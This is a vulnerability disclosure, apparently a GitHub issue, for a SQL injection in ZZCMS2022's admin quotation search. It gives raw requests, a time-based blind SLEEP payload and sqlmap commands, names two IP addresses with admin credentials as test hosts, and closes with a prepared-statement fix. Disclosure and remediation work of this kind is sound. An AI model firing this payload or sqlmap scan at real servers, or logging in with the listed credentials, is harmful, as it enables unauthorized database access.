CVE-2022-40447: ZZCMS2022 is vulnerable to SQL injection in "baojia_list.php" · Issue #5 · liong007/ZZCMS
ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the keyword parameter at /admin/baojia_list.php.
**Exploit Title:** ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
**Date:** 9/11/2022
**Exploit Author:** Yuan Lirong
Vendor Homepage: http://www.zzcms.net/about/6.html
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
Tested on: Windows Server 2008, Ubuntu
Attack vector(s):
ZZCMS is a content management system (CMS) developed by China's zzcms team.
ZZCMS2022 is vulnerable to SQL injection via baojia_list.php.
After the administrator has logged in, SQL injection is possible via the "keyword" parameter of "/admin/baojia_list.php" (authenticated, admin-only endpoint).
POC:
You need an IP address in China to reach the test hosts below.
Case 1:
Login http://119.28.176.129/admin
User: admin Password: 123456
1) Click "报价" (Quotation), then "查找" (Search), and enter `1'` as the search value. The page returns the error "Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /www/wwwroot/zzcms2022/inc/conn.php on line 54".
Check the source code of "/admin/baojia_list.php": the condition variables in the SELECT statement are neither enclosed in single quotation marks nor escaped or parameterised, so a single quote in the input changes the SQL grammar, the query fails (mysqli_query() returns false, hence the warning above), and the parameter is injectable.
2) SQL injection on the "keyword" parameter of "baojia_list.php"

```
POST /admin/baojia_list.php? HTTP/1.1
Host: 119.28.176.129

keyword=1'&Submit=%E6%9F%A5%E6%89%BE
```
EXP (time-based blind payload used to confirm the injection):

```
keyword=1' AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE
```
3) Scanning the saved request with sqlmap

```
sqlmap.py -r sql.txt --level 3 --risk 3 --current-db
```
The contents of sql.txt are as follows:
The sqlmap scan results are as follows:
Case 2:
Login http://175.6.210.20:81/admin
User: admin Password: 123456789qwe
1) Click "报价" (Quotation), then "查找" (Search), and enter `1'` as the search value. The page returns the error "Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in C:\wwwroot\zzcms2022\inc\conn.php on line 54".
2) SQL injection on the "keyword" parameter of "baojia_list.php"

```
POST /admin/baojia_list.php? HTTP/1.1
Host: 175.6.210.20:81

keyword=1'&Submit=%E6%9F%A5%E6%89%BE
```
EXP (same time-based blind payload as in Case 1):

```
keyword=1' AND (SELECT 3526 FROM (SELECT(SLEEP(5)))qvLz)-- Iojq&Submit=%E6%9F%A5%E6%89%BE
```
3) Scanning the saved request with sqlmap

```
sqlmap.py -r sql2021.txt --level 3 --risk 3 --current-db
```
The contents of sql2021.txt are as follows:
The sqlmap scan results are as follows:
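The root cause noted in Case 1 (the "keyword" value is concatenated into the SELECT without quoting, escaping or parameterisation) is fixed by binding the value through a prepared statement. The block below is an added illustration written for this issue, not ZZCMS's own code: the table name, column names and function names are assumptions, only the defect shape and the fix are real.

```php
<?php
// Added illustration for this issue; NOT the ZZCMS source.
// Assumed names: table `baojia`, columns `id`/`title`, both function names.

// Vulnerable shape, as described for /admin/baojia_list.php: the request value
// is placed in the WHERE clause unquoted and unescaped. A value such as 1'
// breaks the SQL grammar, mysqli_query() returns false, and mysqli_fetch_array()
// emits exactly the "boolean given" warning quoted in the report. A crafted
// value can instead alter the query (the SLEEP-based confirmation above).
function baojia_list_vulnerable(mysqli $db, string $keyword): array
{
    $sql = "SELECT id, title FROM baojia WHERE title = " . $keyword; // no quotes, no escaping
    $res = mysqli_query($db, $sql);                                    // false on syntax error
    $rows = [];
    while ($row = mysqli_fetch_array($res)) {                          // warning when $res === false
        $rows[] = $row;
    }
    return $rows;
}

// Hardened form: the SQL text is fixed at prepare time and the user value is
// sent separately as a bound parameter, so quotes, comments or SLEEP() in
// $keyword are data, never grammar. Wrapping the keyword in CONCAT() keeps the
// wildcard handling on the SQL side instead of in PHP string building.
// (get_result() needs the mysqlnd driver; use bind_result() otherwise.)
function baojia_list_fixed(mysqli $db, string $keyword): array
{
    $stmt = $db->prepare(
        "SELECT id, title FROM baojia WHERE title LIKE CONCAT('%', ?, '%')"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $keyword);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage (assumed connection details):
// $db = new mysqli('127.0.0.1', 'zzcms', 'secret', 'zzcms');
// $db->report_mode = MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT; // fail loudly instead of returning false
// $rows = baojia_list_fixed($db, $_POST['keyword'] ?? '');
```

Enabling `MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT` is also worth doing on its own: the failed query then raises an exception that can be logged and alerted on, rather than the silent false return that produced the warning quoted in the report.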